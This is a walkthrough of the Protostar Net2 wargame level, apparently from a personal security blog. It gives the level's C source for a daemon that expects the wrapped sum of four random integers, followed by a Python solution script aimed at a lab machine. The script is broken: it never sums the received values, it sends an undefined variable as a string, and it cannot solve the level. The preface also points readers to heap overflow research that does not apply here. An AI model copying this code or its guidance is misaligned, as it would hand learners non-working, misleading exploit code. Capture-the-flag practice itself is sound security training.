# Binary Exploitation Protostar Net2 - Walkthrough

Hello Guys,

Today In This post, I am going to share with you my walkthrough experience of Exploit Exercise Protostar Net2 Level.

Before Starting Our Walkthrough Let's Take a Look At Hints And Details.

#### Note: I want to highlight Few Points.

• I'm not the creator of protostar war game. I am just a player.
• Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
• Understand all previous levels before starting this one.
• Do some research on Assembly, C/C++ and Gdb
• Do Some Research About Heap overflow exploitation.
•  All Credit Related To Exploit Exercise War Games Goes To exploit-exercises.com.

So, Let's Start.

### Hint

```This code tests the ability to add up 4 unsigned 32-bit integers.
Hint: Keep in mind that it wraps.

This level is at /opt/protostar/bin/net2
```

### Source Code

 ``` 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54``` ```#include "../common/common.c" #define NAME "net2" #define UID 997 #define GID 997 #define PORT 2997 void run() { unsigned int quad[4]; int i; unsigned int result, wanted; result = 0; for(i = 0; i < 4; i++) { quad[i] = random(); result += quad[i]; if(write(0, &(quad[i]), sizeof(result)) != sizeof(result)) { errx(1, ":(\n"); } } if(read(0, &wanted, sizeof(result)) != sizeof(result)) { errx(1, ":<\n"); } if(result == wanted) { printf("you added them correctly\n"); } else { printf("sorry, try again. invalid\n"); } } int main(int argc, char **argv, char **envp) { int fd; char *username; /* Run the process as a daemon */ background_process(NAME, UID, GID); /* Wait for socket activity and return */ fd = serve_forever(PORT); /* Set the client socket to STDIN, STDOUT, and STDERR */ set_io(fd); /* Don't do this :> */ srandom(time(NULL)); run(); } ```

Super Easy!

### Exploit

 ``` 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39``` ```#!/usr/bin/python import struct import socket # Connection Details port = 2997 ip = '192.168.198.128' # Create Socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Socket Bind s.connect((ip, port)) for i in range(4): #print i+1 # Receive data = s. recv(4) print [data] #print bin(data) k="i" #print k print len(data) data = struct.unpack(k, data) print data # Sending s.send(str(num)) # Check Result print s.recv(2048) # Close Port s.close() ```